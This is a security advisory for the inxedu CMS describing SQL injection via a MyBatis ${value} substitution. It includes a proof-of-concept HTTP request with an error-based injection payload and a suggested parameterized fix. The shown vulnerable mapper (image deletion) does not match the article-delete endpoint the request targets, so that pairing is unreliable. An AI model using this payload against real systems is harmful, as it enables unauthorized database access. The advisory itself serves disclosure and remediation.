inxedu through 2018-12-24 has a SQL Injection vulnerability

Vulnerability Type: SQL Injection

Vendor Homepage: https://www.inxedu.com/

Software Link: http://down.admin5.com/jsp/132874.html

Reproduction environment:

CMS v2.0.6, JDK 1.8, Tomcat 7, MySQL 5.5, Maven 3.6.3, IntelliJ IDEA 2018

Vulnerability description and reproduction:

1. The vulnerable code is located at /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml

Here the mapper uses ${value}, which substitutes the raw string directly into the SQL statement instead of binding it as a parameter, so the query is vulnerable to SQL injection.

<!-- Delete ad images -->
<delete id="deleteImages" parameterType="java.lang.String">
  DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>

POST /admin/article/delete HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin/article/showlist
Cookie: JSESSIONID=F36620C2B7BCC31C241FFC3EA9C544FF; inxedulogin_sys_user_=inxedulogin_sys_user_1
Upgrade-Insecure-Requests: 1

articelId=333 AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(9875=9875,1))),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
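The same mapper with the ${value} substitution replaced by a parameterized IN list, shown here as an added example that is not part of the original advisory or of the inxedu project; the ids parameter name and the assumed mapper-method signature are placeholders chosen for illustration.

```xml
<!-- Vulnerable form, as shipped in WebsiteImagesMapper.xml:
     ${value} is pasted into the SQL text before it reaches the JDBC
     driver, so whatever string arrives here becomes part of the statement. -->
<delete id="deleteImages" parameterType="java.lang.String">
  DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>

<!-- Hardened form (added example). Assumed mapper-method signature:
       int deleteImages(@Param("ids") List<Integer> ids);
     <foreach> builds the IN list at statement-build time, and #{id}
     binds each element as a JDBC PreparedStatement parameter, so the
     SQL text is fixed and the ids can only ever be treated as data. -->
<delete id="deleteImages">
  DELETE FROM EDU_WEBSITE_IMAGES
  WHERE IMAGE_ID IN
  <foreach collection="ids" item="id" open="(" separator="," close=")">
    #{id}
  </foreach>
</delete>
```

The caller must reject an empty list before invoking the mapper, because an empty foreach emits `IN ()`, which MySQL rejects as a syntax error; parsing the incoming ids into integers in the controller adds a second, independent check that non-numeric input never reaches the database.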
